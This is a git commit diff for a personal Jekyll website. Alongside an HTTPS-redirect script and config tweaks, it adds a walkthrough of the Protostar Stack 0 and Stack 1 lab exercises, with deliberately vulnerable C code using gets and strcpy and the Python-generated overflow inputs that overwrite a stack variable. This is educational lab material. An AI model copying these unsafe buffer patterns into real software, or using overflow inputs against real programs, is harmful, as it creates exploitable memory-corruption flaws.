pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

new site4

master
Paul Walko 2016-06-15 01:06:03 -04:00
parent dac869dc5d
commit cabe6e0794
12 changed files with 275 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
_config.yml
View File

@ -10,7 +10,8 @@ excerpt_separator: "[-----]"
# mode: dev
mode: product
url: http://paul.walko.org/
url: https://paul.walko.org/
enforce_ssl: paul.walko.org/
devurl: http://localhost:4000/
name: Paul Walko
title: Paul Walko
@ -27,13 +28,9 @@ my:
address:
country: United States
skills:
security: ["Wireshark", "IDA", "Ollydebug"]
security: ["Wireshark", "IDA", "GDB"]
coding: ["C", "C++", "Python", "Java", "bash", "HTML"]
tools: ["Linux"]
collections:
qqGroupGuide:
output: true
tools: ["Linux", "vim", "Arch Linux"]
defaults:
- scope:
@ -41,8 +38,5 @@ defaults:
type: "posts"
values:
excerpt: "{{ page.content }} | slice: 0 300"
- scope:
path: ""
type: "qqGroupGuide"
values:
layout: markdownreader_bare

9
_includes/head_base.html
View File

@ -1,4 +1,9 @@
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="{% if page.excerpt %}{{ page.excerpt | strip_html | strip_newlines | truncate: 160 }}{% else %}{{ site.description }}{% endif %}">
@ -29,6 +34,10 @@
<script type="text/javascript" src="{{crturl}}javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="{{crturl}}javascripts/html5shiv.js"></script>
<![endif]-->

2
_includes/header.html
View File

@ -37,7 +37,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})

94
_posts/2016-06-14-nebula_exploit_exercises.md
View File

@ -1,7 +1,99 @@
---
title: "Protostar Exploit Exercises Solutions 0-3"
title: "Protostar Exploit Exercises Solutions 0-1"
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
---
# Stack 0
Here's what we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
```
The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable.
I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:
```
$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
```
That works as expected, now with 65 bytes:
```
$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
```
Solved!
# Stack 1
Here's the code we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
```
Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before.
Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order:
```
$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
```
That works as expected, now with the additional bytes:
```
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
```
Woo!

11
_site/404.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})

11
_site/about/index.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})

13
_site/category/index.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -139,7 +148,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

13
_site/index.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -107,7 +116,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

4
_site/sitemap.xml
View File

@ -6,13 +6,13 @@
<url>
<loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
<lastmod>2016-06-15T00:02:53-04:00</lastmod>
<lastmod>2016-06-15T01:05:43-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>
<url>
<loc>http://paul.walko.org//writeup/test_post</loc>
<lastmod>2016-06-15T00:02:53-04:00</lastmod>
<lastmod>2016-06-15T01:05:43-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>

17
_site/tag/index.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -81,7 +90,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -167,7 +176,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -330,7 +339,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -425,7 +434,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-3</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

105
_site/writeup/nebula_exploit_exercises.html
View File

@ -5,11 +5,16 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-3</title>
<title>Protostar Exploit Exercises Solutions 0-1</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://paul.walko.org/favicon/apple-icon-57x57.png">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
@ -100,7 +109,7 @@
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-3</p>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
<ul class="tags clearfix">
@ -116,7 +125,95 @@
</header>
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
Im guessing if I put in a string longer than 64 bytes it will work. Lets see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Heres the code were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Just like Stack 0, were given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and were also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so Ill input the value in reverse order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
</div>

11
_site/writeup/test_post.html
View File

@ -5,6 +5,11 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="This is an excerpt; please ignore">
@ -35,6 +40,10 @@
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})